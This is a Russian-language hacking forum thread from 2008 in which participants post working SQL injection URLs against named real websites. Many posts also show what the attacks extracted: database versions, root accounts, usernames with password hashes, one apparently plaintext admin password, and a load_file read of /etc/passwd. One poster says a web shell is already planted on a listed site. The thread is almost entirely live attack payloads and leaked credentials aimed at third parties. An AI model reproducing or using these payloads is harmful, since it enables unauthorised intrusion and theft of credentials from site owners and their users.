ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5891  
Старый 05.07.2008, 23:40
Аватар для [Illuminati]
[Illuminati]
Banned
Регистрация: 05.07.2008
Сообщений: 2
Провел на форуме:
7215

Репутация: 2
По умолчанию

http://www.lexisnexis.ca/bookstore/bookinfo.php?pid=-20+union+select+1,cast(version()+as+binary),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
 
Ответить с цитированием

  #5892  
Старый 06.07.2008, 00:13
Аватар для K1nD[e]R
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.vip-gsm.ru/spec.php?id=-573'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2F,user,password),13,14,15,16,17,18+from+mysql.user/*
Version: 4.1.18
User/Pass: root/40cdfeb7631887f0
 
Ответить с цитированием

  #5893  
Старый 06.07.2008, 00:34
Аватар для [Illuminati]
[Illuminati]
Banned
Регистрация: 05.07.2008
Сообщений: 2
Провел на форуме:
7215

Репутация: 2
По умолчанию

K1nD[e]R, на вип джи эс эм у меня уже давно шелл лежит, там file_priv =Y b кавычки не экранируются, в ошибке путь виден, папка на заливку sql/images вроде,
 
Ответить с цитированием

  #5894  
Старый 06.07.2008, 00:50
Аватар для otmorozok428
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию

Белорусский Республиканский ТЕАТР ЮНОГО ЗРИТЕЛЯ

Цитата:
Сообщение от kair  
http://tuz-by.com/viewperson.php?id=180%20union%20select%201,2,3,4,5 ,6,7,8,9,10/*
При инъекции в скрипте persons.php можно узнать немного больше

Код:
http://www.tuz-by.com/persons.php?type=1+union+select+1,2,version(),user(),5,6,7,8,database(),10--
VERSION(): 4.0.24_Debian-10sarge2-log
DATABASE(): tuzbycom
USER(): tuzbycom@localhost

Так же подвержен скуль-инъекции скрипт

Код:
http://www.tuz-by.com/viewpress.php?id=13+union+select+1,2,3,4,5,6,7--
 
Ответить с цитированием

  #5895  
Старый 06.07.2008, 01:08
Аватар для K1nD[e]R
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://shirley.ru/cat.php?id=-3+union+select+concat_ws(0x2F,uid,uname,pass),2+from+shir_users+limit+3,3/*
Version: 5.0.33

uname/pass : Алексей/c6f057b86584942e415435ffb1fa93d4
P.S юзаем (limit+x,x) для вывода юзеров=)
 
Ответить с цитированием

  #5896  
Старый 06.07.2008, 01:39
Аватар для K1nD[e]R
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.ixbt.com/news/news.php?id=-1+union+select+1,2,concat_ws(0x2F,name,password),version(),5,6,7,8,9,10,11+from+user+limit+3,3/*
Version: 4.0.27
name/pass: Administrator/another_enter
P.S юзаем (limit+x,x) для вывода юзеров=)
 
Ответить с цитированием

  #5897  
Старый 06.07.2008, 08:39
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Davinciinstitute.com - PR 6
Цитата:
http://www.davinciinstitute.com/page.php?ID=-1'+union+select+1,2,3,concat_ws(0x3a,LoginName,Pas sword),5,6+from+AdminUsers/*
как разшифровать? попробвал hex(ascii)=md5

Bouldertheater.com - PR 6
Цитата:
http://www.bouldertheater.com/event_detail.php?id=999999+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41+from+information_schema.tables+limit+1 7,1--
Umpcportal.com - PR 6
Цитата:
http://www.umpcportal.com/products/product.php?id=9999999+union+select+version(),2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
Linspire.com - PR 7
Цитата:
http://www.linspire.com/linspire_letter_archives.php?id=9999999+union+sele ct+1,version(),3,4/*
Allianceforbiz.com - PR 6
Цитата:
http://www.allianceforbiz.com/events/specific_event.php?id=999999+union+select+1,versio n(),3,4/*
Koleso.topof.ru - PR 4
Цитата:
http://koleso.topof.ru/testing_info.php?id=9999+union+select+1,2,concat_w s(0x3a,admin_login,admin_password),4,5,6,7+from+ko leso_ktopof.admins/*
Cccs.com - PR 5
Цитата:
http://www.cccs.com/index.php?id=99999+union+select+1,2,3/*
увы.. но для вывода нужно зарегатся..(

Последний раз редактировалось sabe; 13.07.2008 в 07:44..
 
Ответить с цитированием

  #5898  
Старый 06.07.2008, 11:25
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

Да, чёта меня на метео потянуло...
gismeteo.ru

Google PR 6 / 10
Яндекс тИЦ 19000

Цитата:
http://avia.gismeteo.ru/avia.php?id=27612+union+select+1+limit+1,1--
Database Version: 4.1.1-alpha-standard
Database name: search
User name: root@localhost
 
Ответить с цитированием

  #5899  
Старый 06.07.2008, 12:03
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Viperson.ru - PR 4
Цитата:
http://www.viperson.ru/wind.php?ID=999999+UNION+SELECT+AES_DECRYPT(AES_EN CRYPT(CONCAT(Version()),0x71),0x71)/*
Cyberthing.net - PR 3
Цитата:
http://www.cyberthing.net/video-play.php?id=9999+union+select+1,table_name,3,4,5,6 ,7+from+information_schema.tables/*
Dimi4
Цитата:
http://avia.gismeteo.ru/avia.php?id=27612+union+select+aes_decrypt(aes_enc rypt(load_file(0x2F6574632F706173737764),0x71),0x7 1)+limit+1,1--
load_file никто не отменял..)
Цитата:
http://avia.gismeteo.ru/avia.php?id=27612+union+select+aes_decrypt(aes_enc rypt(concat_ws(0x3a,user,password),0x71),0x71)+fro m+mysql.user+limit+1,1--
и это. но сдесь почемуто на рута пасса нету

Последний раз редактировалось sabe; 06.07.2008 в 12:57..
 
Ответить с цитированием

pr-cy.ru
  #5900  
Старый 06.07.2008, 15:27
Аватар для 159932
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию pr-cy.ru

pr-cy.ru
Цитата:
http://pr-cy.ru/faq/-21+union+select+1,2,3.html
5.0.51a-community-log
доступны только стандартные таблицы и одна таблица FAQ ..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ